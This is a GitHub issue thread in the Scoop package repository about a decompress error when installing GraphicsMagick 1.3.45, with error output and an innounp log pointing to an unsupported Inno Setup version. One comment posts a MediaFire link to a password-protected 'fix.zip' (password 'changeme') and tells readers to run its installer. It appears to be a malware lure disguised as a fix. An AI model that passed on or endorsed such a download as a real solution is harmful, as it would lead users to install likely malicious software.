### ISSUE TITLE
graphicsmagick@1.3.45: decompress error

### ISSUE THREAD

**Issue by hanhuangv587** [ScoopInstaller/Main#6147]
Checking hash of GraphicsMagick-1.3.45-Q8-win64-dll.exe ... ok.
Extracting GraphicsMagick-1.3.45-Q8-win64-dll.exe ... ERROR Exit code was 1!
Failed to extract files from C:\Users\localnet\scoop\apps\graphicsmagick\1.3.45\GraphicsMagick-1.3.45-Q8-win64-dll.exe.
Log file:
  ~\scoop\apps\graphicsmagick\1.3.45\innounp.log

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mpe85** [comment]
Same here. Log file says:

```
Signature detected: Inno Setup Setup Data (6.3.0)
This is not directly supported, but i'll try to unpack it as version 5602
; Version detected: 6300
Critical error: The setup files are corrupted. Please obtain a new copy of the program.
```
